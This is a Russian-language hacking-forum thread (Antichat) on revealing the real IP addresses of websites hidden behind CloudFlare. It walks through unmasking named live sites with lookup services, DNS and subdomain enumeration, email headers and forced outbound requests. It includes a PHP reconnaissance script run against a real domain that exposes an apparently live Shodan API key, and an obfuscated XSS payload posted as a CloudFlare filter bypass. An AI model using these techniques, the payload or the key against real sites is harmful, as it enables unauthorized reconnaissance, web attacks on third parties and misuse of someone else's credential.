1. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    188
    Reputations:
    57
    Что такое CloudFlare?
    CloudFlare – это сервис по обслуживанию и обеспечению безопасности.
    Часто различные сайты прячут за ним свой реальный IP.
    [​IMG]
    Для того что бы разкрыть реальный IP будем использовать известные онлайн тулзы.
    И так для примера возмем сайт c CloudFlare
    PHP:
    http://gre4ka.info
    Для начала проверим IP:
    Code:
    ping gre4ka.info
    Получим IP:104.28.18.120
    [​IMG]

    Пробуемм подключится по 80 порту:
    Получем ошибку из которой видно что IP пренадлежит CloudFlare
    [​IMG]
    Дальше идем на сайт сервис по раскрытию IP -адресов которые прячутся за CloudFlare:
    PHP:
    http://www.crimeflare.com/cfs.html
    И просто в поиске вбиваем наш сайт...
    В итоге получаем реальный IP:
    Code:
     gre4ka.info 146.185.128.222
    [​IMG]
    Проверяем прямое подключение по IP на 80 порт:
    Получаем сайт уже без CloudFlare.Дальше уже спокойно можно работать с софтом и проводит аудит не только веб-приложения но и целевой системы(сканить порты,сервисы и т.д...)
    [​IMG]
    Еще как вариант можно использовать утилитку DIG для того что разкрыть возможные dns-имена,затем пинговать их:
    [​IMG]
    Но в нашем случае все записи не принадлежат реальному IP (
    Еще один способ разкрытия реального IP сайта - это через почту.Это может быть регистрация на сайте или любой другой способ вынудить отправить вам письмо с веб сервера.И в теле письма посмотреть IP адрес.
     
    #1 Mister_Bert0ni, 30 May 2015
    Last edited: 30 May 2015
    quite gray, Ardddz, BenderMR and 14 others like this.
  2. CyberTro1n

    CyberTro1n Active Member

    Joined:
    20 Feb 2016
    Messages:
    286
    Likes Received:
    183
    Reputations:
    1
    Нашел)) спасибо! nmap можно добавить. А что еще взять если нет возможности отправить письмо(не с сервер), или же вообще отправка не привязана к реальному ипу?
     
    quite gray likes this.
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Способов-то много, но не один не является идеальным.
     
    CyberTro1n likes this.
  4. CyberTro1n

    CyberTro1n Active Member

    Joined:
    20 Feb 2016
    Messages:
    286
    Likes Received:
    183
    Reputations:
    1
    Например? Заметил, сегодня юзану по этой теме. Интересно что получится. А на другой стороне мои действия как отображаться могут, отображается?
     
    quite gray likes this.
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Логи, ну я хз, шодан как вариант, придумывать надо, надо изучать тему.
     
    quite gray likes this.
  6. CyberTro1n

    CyberTro1n Active Member

    Joined:
    20 Feb 2016
    Messages:
    286
    Likes Received:
    183
    Reputations:
    1
    Логи однозначно) в системе клауда и в самой цели?
     
    #6 CyberTro1n, 29 Sep 2016
    Last edited: 30 Sep 2016
    quite gray likes this.
  7. Djoser

    Djoser Member

    Joined:
    9 Nov 2015
    Messages:
    50
    Likes Received:
    9
    Reputations:
    0
    такой вопрос, а что если сервер по ip не открывается, как быть в таком случае? там наврно могут быть какие-то проверики? типа пришел не с клауд сервера а прямо....
     
    quite gray likes this.
  8. CyberTro1n

    CyberTro1n Active Member

    Joined:
    20 Feb 2016
    Messages:
    286
    Likes Received:
    183
    Reputations:
    1
    [​IMG]

    я знаю что долго в кс играл. не пойму как столько доменов на одном ипе. как дальше идти, крутить?
     
  9. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Как вариант ещё можно посмотреть историю изменения IP. Тот же viewdns.info может показать историю.
     
    quite gray likes this.
  10. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,097
    Likes Received:
    788
    Reputations:
    229
    https://medium.com/@denyfebriant/bypass-xss-filter-cloudflare-on-indodax-com-526fb32ffa08
    Code:
    Свежий bypass xss фильтра Cloudflare %22}%3C%2500svg%26%23x09%3bx%2f%2500onload%3d%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000100%26%230000111%26%230000099%26%230000117%26%230000109%26%230000101%26%230000110%26%230000116%26%230000046%26%230000100%26%230000111%26%230000109%26%230000097%26%230000105%26%230000110%26%230000041%3E
    
     
    _________________________
    man474019, joelblack and panic.ker like this.
  11. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,097
    Likes Received:
    788
    Reputations:
    229
    _________________________
    man474019, joelblack and crlf like this.
  12. MstCard

    MstCard New Member

    Joined:
    1 Jun 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    dnsdumper, sublist3r, cloudfail это же обратный прокси, насколько знаю обходится поиском ипа которые не за клаудом.
     
  13. a1tiRi

    a1tiRi New Member

    Joined:
    11 Jun 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
  14. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    а вот еще метод:

    https://medium.com/secure-hacker/by...ction-get-subdomains-ofa-website-2cb1d749c510

    а вообще - нужно бы норм скрипт написать чтобы вбил вот - и возможные варинаты ип вылетали. (иогнла правда нужно с hosts колдовать).
    нужно собрать базу знаний по cf - часто встречаться стал подлец
     
  15. xmp

    xmp Member

    Joined:
    14 Dec 2018
    Messages:
    13
    Likes Received:
    9
    Reputations:
    4
    Ещё из методов: если есть аплоуд на сайте можно грузить фаил/картинку и смотреть реальный ип в логах.

    Решил попрактиковатся и собрать всё в кучу:
    Code:
    <?php
    $start = microtime(true);
    
    $host = '100yellow.com';
    
    
    function get_cookie($host){
    $ch = curl_init('http://'.$host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    $result = curl_exec($ch);
    preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result, $matches);
    $cookies = array();
    foreach($matches[1] as $item) {
        parse_str($item, $cookie);
        $cookies = array_merge($cookies, $cookie);
    }
    return $cookies;
    }
    
    
    
    function fixed_gethostbyname($host) {
        $ip = gethostbyname($host);
        if ($ip != $host) { return $ip; }// else return false;
    }
    
    function cidr_match($ip) {
    
    $cloud = array("103.21.244.0/22",
                   "103.22.200.0/22",
                   "103.31.4.0/22",
                   "104.16.0.0/12",
                   "108.162.192.0/18",
                   "131.0.72.0/22",
                   "141.101.64.0/18",
                   "162.158.0.0/15",
                   "172.64.0.0/13",
                   "173.245.48.0/20",
                   "188.114.96.0/20",
                   "190.93.240.0/20",
                   "197.234.240.0/22",
                   "198.41.128.0/17");
    
    foreach($cloud as $cidr) {
       list($subnet, $mask) = explode('/', $cidr);
       if ((ip2long($ip) & ~((1 << (32 - $mask)) - 1) ) == ip2long($subnet)) {
       return true;
      }
       continue;
      }
       return false;
    }
    
    $subDomainList = array("www","www2","ftp","mail", "irc",
                  "smtp","pop","staging", "demo", "mx", "mx2",
                  "stage","test","testing", "tmp",
                  "temp", "ns","ns2","vpn","firewall",
                  "ssh","content","images", "img",
                  "docs","doc","dl","services","api",
                  "erp","storage","cloud", "cdn", "encrypted",
                  "finance","blog","english",
                  "forum","forums","board","boards");
    
    $ip = fixed_gethostbyname($host);
    $ips = array();
    $good = array();
    
    if(isset($ip)){
     $result = cidr_match($ip);
    if($result == 'true'){
    foreach($subDomainList as $subDomain) {
      $ips[] = fixed_gethostbyname($subDomain.'.'.$host);
    }
    foreach($ips as &$ip){
            $result = cidr_match($ip);
      if($result != 1){
         $good[] = $ip;
      }
    }
    }
      }
     else{
         print $host. ':' .$ip;
         die();
     }
    
    $shodan = file_get_contents('https://api.shodan.io/shodan/host/search?key=efdP1hAuSjwzJ1yDcU13hj2YPQJJ8ush&query='.$host);
    $shodan = json_decode($shodan);
    
    $dns = dns_get_record($host);
    
    print $host. PHP_EOL;
    print 'dns records: '. PHP_EOL;
    print_r($dns). PHP_EOL;
    print 'subdomain ips: '. PHP_EOL;
    print_r($good);
    print 'shodan: '. PHP_EOL;
    print_r($shodan). PHP_EOL;
    print 'Cookie:'. PHP_EOL;
    print_r(get_cookie($host));
    
    
    print 'time: '.round(microtime(true) - $start, 4).' sec.';
    
    
    
    аутпут:
    Code:
    "/usr/bin/php" "/home/user/opencart/cloudflare.php"
    100yellow.com
    dns records:
    Array
    (
        [0] => Array
            (
                [host] => 100yellow.com
                [class] => IN
                [ttl] => 2733
                [type] => HINFO
                [cpu] => ANY obsoleted
                [os] => See draft-ietf-dnsop-refuse-any
            )
    
    )
    subdomain ips:
    Array
    (
        [0] =>
        [1] => 139.59.29.219
        [2] => 97.74.135.10
        [3] =>
        [4] => 72.167.238.29
        [5] => 97.74.135.10
        [6] =>
        [7] =>
        [8] =>
        [9] =>
        [10] =>
        [11] =>
        [12] =>
        [13] =>
        [14] =>
        [15] =>
        [16] =>
        [17] =>
        [18] =>
        [19] =>
        [20] =>
        [21] =>
        [22] =>
        [23] =>
        [24] =>
        [25] =>
        [26] =>
        [27] =>
        [28] =>
        [29] =>
        [30] =>
        [31] =>
        [32] =>
        [33] =>
        [34] =>
        [35] =>
        [36] =>
        [37] =>
        [38] =>
    )
    shodan:
    stdClass Object
    (
        [matches] => Array
            (
            )
    
        [total] => 0
    )
    Cookie:
    Array
    (
        [__cfduid] => dc2e8b1b92037edbb4c18f6ff9f2aba3c1549291585
    )
    time: 4.7554 sec.
    Done.
    
    
    
    shodan - мимо.
    subдомены - дали реальный результат.


    139.59.29.219 - редирект на www.139.59.29.219
    Как задетектить что ип пренадлежит домену?
    Сравнению контента мешает капча при клауд домене, детекчу по кукам. Кто знает вариант как обойти?
     
    #16 xmp, 4 Feb 2019
    Last edited: 4 Feb 2019
    grimnir likes this.
  16. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,986
    Likes Received:
    871
    Reputations:
    198
    https://github.com/KyranRana/cloudflare-bypass этот обходит CF UAM page. Там 2 метода - curl и сокеты. Код на курле почему-то не захотел работать а сокеты проходят проверку.
     
    _________________________
    xmp likes this.
  17. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    428
    Likes Received:
    578
    Reputations:
    46
    Из методов которые я знаю:
    1. Если на сайте есть регистрация или какая-либо возможность отправки почты то регаемся (или заставляем сайт отправить нам письмо) и смотрим айпишник сервера в заголовках письма. В 95% случаев письмо отправляется с самого сервера. Хотя некоторые сайты используют внешний smtp типа mailgun, тогда этот способ не проканает.
    2. Если на сайте есть возможность заливки аватара по ссылке (или любая другая возможность заставить перейти сайт по ссылке) то можно заставить сайт перейти по ссылке и в логах сервера при обращении к твоей ссылке будет виден айпишник сервера.
     
    quite gray and dehimb like this.
  18. PapaRed

    PapaRed Moderator

    Joined:
    30 Jun 2010
    Messages:
    23
    Likes Received:
    60
    Reputations:
    25
  19. Gorbachev

    Gorbachev Level 8

    Joined:
    23 Mar 2017
    Messages:
    254
    Likes Received:
    135
    Reputations:
    65
    Code:
    // -- 3. Get JavaScript answer.
    eval( $iuam_jschl );
    
    Клоуд будет очень доволен.
     
Loading...